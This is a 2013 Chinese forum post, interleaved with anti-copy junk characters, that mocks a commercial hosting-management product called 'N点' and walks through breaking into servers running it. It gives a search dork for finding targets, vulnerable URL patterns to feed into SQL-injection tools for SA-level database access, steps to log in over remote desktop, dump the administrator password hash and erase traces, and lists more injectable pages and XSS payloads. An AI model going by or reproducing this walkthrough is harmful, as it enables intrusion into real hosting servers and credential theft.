不得不说N点实在是一个破东西
3 k4 |7 v2 r+ ?( ]" k* @0 E就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂: X' _% q+ B4 U% ^! D! @* L
好吧 抱怨一下就行了 接下来关键的时候到了
+ E& K# g" s6 N9 R1 P6 Y首先百度搜索关键字:inurl: (mmdatabase.asp)
+ U+ y* e" W" a3 @8 ~( j# c我随便列举一个: www.xxxx.com, b6 p9 U# H5 f% o0 P
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
! b5 R% i& Y9 p扔入NBSI 或者啊D等各种傻逼工具后
+ K7 u8 h7 e0 m# L你们会看到是SA权限- |! Z, @- |7 H$ o
果断3389 上去 hash得到administrator密码* F. }" U/ L9 \/ e
擦屁股走人~1 J+ [4 S/ K- Y9 E9 i! J( u: g
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
2 [) j7 p2 o# H' k" c; e3 i % s! H7 r" z7 }
再附上其他几个漏洞页面8 y; @1 J, z2 f$ I8 S$ M3 ~
SQL:
: W0 G7 P+ I6 F# U$ Vhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1 `" @) ^+ y. Z# f& w" g
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
7 q- f( { b. M) C0 x9 V2 Z% E$ ]; P0 `7 Rhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9$ X; O! n/ v: d' o
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
( T$ m0 j5 t l, t1 DXSS证明:
% a: ?$ K5 y9 ]http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”& q; o) V; [! c3 P
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”& ~, ?% B8 ?; c1 ]9 G$ R& V
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>1 l0 C! |4 h! F+ E, H: q$ @5 D6 ^' D$ V
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜) c) w* \) |* z; m- v7 w
还是星外吧 你们懂的
& c0 N% `$ b" S; B* O作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
6 O0 M. }) s8 I6 MPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉6 P$ s: m L, X0 U" ^
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对